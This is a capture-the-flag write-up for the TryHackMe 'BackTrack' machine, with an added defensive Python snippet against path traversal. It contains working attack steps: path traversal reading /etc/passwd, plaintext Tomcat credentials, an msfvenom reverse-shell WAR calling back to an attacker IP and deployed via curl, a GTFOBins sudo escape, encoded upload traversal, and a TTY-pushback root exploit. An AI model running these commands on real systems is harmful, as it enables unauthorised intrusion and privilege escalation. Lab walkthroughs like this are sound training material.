BackTrack (THM)
Hello everyone, we are back again with BackTrack. Let's get into it.
Enumeration.
Open ports.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 55:41:5a:65:e3:d8:c2:4f:59:a1:68:b6:79:8a:e3:fb (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDzPMYVGNn9fk2sUO4qG8t3GP/3ztCkoIRFTSFwnaHtRTiIe8s3ulwJkAyTZHSmedBOMihmyWyEmA44uxY4kUZEiba8R+c7aWHjTvD04VcKWPgVg1URPWMTHyxUcwKGnoh8n6VwM283+/4f2g2GSj2pVbacoV3xfDo8L4PshyfHK7dEd2qnQv9Yge3p5Aw/1Q7w1eaMZnaoicgzDgjhvqrRcS/DRcp3Lwoz6fGQW2/vFxW7d5aisTslKxRPslTy/Vrgprb7I+D9kdGEFqW/DXDfZLo+4O0woecE6+qSYPbIAjvIao25MTR8xHOFR0sCtyVfehEXYxvJ0fsqBG4yp/y15eDT3MSYevdvhHH1ZLejV66zILbPqUhzFBuMW1U6PKvSNPiQdzlnIRpD8ZQN7KJI8Y6zlHgoh8iu7+PgcUQNixYrX1GhMCYwNGHQlLOLriVRzhScZV3ObH1V8+g8I2sc3WZ54G2XUqZX+pN3ugjN1L5mo8mht1m7ZME+W9if37U=
| 256 79:8a:12:64:cc:5c:d2:b7:38:dd:4f:07:76:4f:92:e2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJfVuy7uiXVmzWVPtY/BYF+RZF36ZR8rh7wxeZi7yeOdWd06henZf8z5rYfalc0YHr6kE3clVa0jq+pF64w/lso=
| 256 ce:e2:28:01:5f:0f:6a:77:df:1e:0a:79:df:9a:54:47 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHMk87a1jTdUzEWZNm/XtZKIto5reBlJr75kFdCKXscp
6800/tcp open http syn-ack ttl 63 aria2 downloader JSON-RPC
|_http-title: Site doesn't have a title.
| http-methods:
|_ Supported Methods: OPTIONS
8080/tcp open http syn-ack ttl 63 Apache Tomcat 8.5.93
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/8.5.93
8888/tcp open sun-answerbook? syn-ack ttl 63
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/html
| Date: Sun, 13 Oct 2024 06:02:10 GMT
| Connection: close
| <!doctype html>
| <html>
| <!-- {{{ head -->
| <head>
| <link rel="icon" href="../favicon.ico" />
| <meta charset="utf-8">
| <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <meta name="theme-color" content="#0A8476">
| <title ng-bind="$root.pageTitle">Aria2 WebUI</title>
| <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Lato:400,700">
| <link href="app.css" rel="stylesheet"><script type="text/javascript" src="vendor.js"></script><script type="text/javascript" src="app.js"></script></head>
| <!-- }}} -->
| <body ng-controller="MainCtrl" ng-cloak>
| <!-- {{{ Icons -->
|_ <svg aria-hidden="true" style="position: absolute; width: 0; height: 0; overflow: hidden;" version="1.1" xm
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
So we have 22, 6800, 8080 and 8888 open.
Enumerate (6800)
After some searching I could not find anything here, so I will enumerate the rest and maybe come back to it.
Enumerate (8080)
This port runs Tomcat, and it needs login credentials before we can do anything, so let's move on to the last one and see if there is anything there.
Enumerate (8888)


So let's try some basic path traversal techniques and some fuzzing. And indeed, it was vulnerable to local file inclusion, because it tries to open the file without any checking of the user input, which is a big no-no. 😯
You can refer to this link for more information on how the code actually works: https://gist.github.com/JafarAkhondali/528fe6c548b78f454911fb866b23f66e
curl --path-as-is http://backtrack.thm:8888/../../../../../../../../../../../../../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:112:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:122:MySQL Server,,,:/nonexistent:/bin/false
tomcat:x:1002:1002::/opt/tomcat:/bin/false
orville:x:1003:1003::/home/orville:/bin/bash
wilbur:x:1004:1004::/home/wilbur:/bin/bash
So as you can see, we are able to exploit it. Let's try to get something useful now. After a bit of searching I found the credentials of the tomcat user.

Username: tomcat
password: OPx52k53D8OkTZpx4fr
Initial Access.
Reverse Shell.
After I got the creds, I searched for how I could use the manager-script role to exploit the system. I found that this role means I cannot access the GUI management tool, but I can access the endpoints under /manager/text, so all we need to do is create a reverse shell and upload it to the server. You can refer to the following link for a great example.
https://medium.com/@cyb0rgs/exploiting-apache-tomcat-manager-script-role-974e4307cd00
To create the reverse shell I used msfvenom.
msfvenom -p java/shell_reverse_tcp lhost=10.11.96.110 lport=4444 -f war -o pwn.war
And to upload it to the server I used curl.
curl -v -u tomcat:OPx52k53D8OkTZpx4fr --upload-file pwn.war "http://backtrack.thm:8080/manager/text/deploy?path=/foo&update=true"
Finally, with a netcat listener ready, we use curl again to trigger the deployed shell:
nc -nlvp 4444 # netcat for sure.
curl http://backtrack.thm:8080/foo


Access as Wilbur.

So as you can see, first we have sudo privileges as wilbur on ansible-playbook, which is a tool to manage automated tasks. This one is quite simple, but it actually took me a long time to figure out 😢. Using this source we can figure out how to spawn a shell from a task: https://gtfobins.github.io/gtfobins/ansible-playbook/
echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >> /tmp/file.yml
chmod 777 /tmp/file.yml
And after that we can simply run the following command
tomcat@Backtrack:/opt/test_playbooks$ sudo -u wilbur ansible-playbook /opt/test_playbooks/../../../../../tmp/file.yml

And after that we simply get a shell as wilbur.
Access as Orville.
So first we see a message to wilbur from orville.

And we also have another note which contains SSH creds.

So let's see what orville talks about.

We can see here a known HTTP port we have not seen before, so let's do some port forwarding using SSH.

And now we can access it on port 80 on our machine.

After logging in we see an upload form, and the project runs PHP, so we may be able to execute PHP on the machine.

We cannot simply upload a PHP file, so there may be another way to do that.
Oh man, after some time of testing I found that we can upload a file named like fileName.png.php, but it will not be executed on the server. Let's check the Apache config to figure out why.
wilbur@Backtrack:~$ cat /etc/apache2/apache2.conf

So that's why. Since we have been performing path traversal, I believe we need to do the same here. After some testing I found that we can use URL encoding.

When we encode ../ multiple times, it works.
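Both traversal issues on this box, the file opened straight from the raw request path on port 8888 and the ../ that gets through once it is URL-encoded more than once, come down to checking the path before it is fully decoded and canonicalised. The following is an added example, not code from the room, the gist or any of the linked articles: it assumes a hypothetical document root WEBROOT, fully decodes a request path, refuses anything that normalises outside the root, and labels rejected requests for log review.

```python
import os
from typing import Optional, Tuple
from urllib.parse import unquote

# Hypothetical document root of the file-serving endpoint (not a path from the room).
WEBROOT = "/srv/webui"


def decode_fully(raw: str, max_rounds: int = 5) -> Tuple[str, int]:
    """Percent-decode until the string stops changing.

    The returned count is the number of decode passes that changed the input:
    0 for a plain path, 1 for "%2e%2e%2f", 2 for "%252e%252e%252f", and so on.
    Checking only the single-decoded form is what lets multi-encoded ../ slip through.
    """
    current, rounds = raw, 0
    while rounds < max_rounds:
        decoded = unquote(current)
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    return current, rounds


def resolve_under_root(root: str, request_path: str) -> Optional[str]:
    """Map a request path onto the document root, refusing anything that escapes it.

    The vulnerable server joined the raw request path onto its root and opened
    the result. Here the path is fully decoded and normalised first, and the
    normalised result must still sit below root. Returns the filesystem path,
    or None when the request would leave the document root.
    """
    decoded, _ = decode_fully(request_path)
    root_norm = os.path.normpath(root)
    # Leading slashes are stripped so the request is always relative to root.
    candidate = os.path.normpath(os.path.join(root_norm, decoded.lstrip("/")))
    if os.path.commonpath([root_norm, candidate]) != root_norm:
        return None
    return candidate


def classify_request(request_path: str) -> str:
    """Label a request for log review: how (if at all) it tried to leave WEBROOT."""
    if resolve_under_root(WEBROOT, request_path) is not None:
        return "ok"
    _, rounds = decode_fully(request_path)
    if rounds == 0:
        return "traversal"
    return "encoded-traversal" if rounds == 1 else "multi-encoded-traversal"
```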

And by doing so we can see this too.

And here we have it.

By the way, this is the payload I used.

And now let's just upload our reverse shell.

After opening a Python server with
python3 -m http.server 8000

And now we know the file is on the machine.

Let's change the permissions and execute it.

%63%68%6d%6f%64%20%2b%78%20%65%78%70%6c%6f%69%74%2e%73%68
Now let's run it.



Access as Root.
To get a stable shell I generated an SSH key.

This will produce the orville and orville.pub key files. Copy the content of orville.pub into /home/orville/.ssh/authorized_keys, copy the content of orville onto your machine, change its permissions to 600 and log in with it.

Exploit TTYPushback.
After some searching I used pspy64 to see what is going on under the hood, and I saw this.

So basically the root user logs in via SSH and switches to the orville user, which then zips some stuff. The problem here is that the root user does not use the -p flag, which is used to create a new TTY, so we may be able to retrieve the root session and execute commands.
This is a great explanation of the technique and how to exploit it: https://www.errno.fr/TTYPushback.html

So this is the Python code; just change the command to add the s bit to bash so we can execute it as root, and put that into .bashrc, which will be executed automatically once root switches to the other user.

And after some time we will see this.


Ending
In the end, this machine was quite fun and had some new things I had not seen before 👍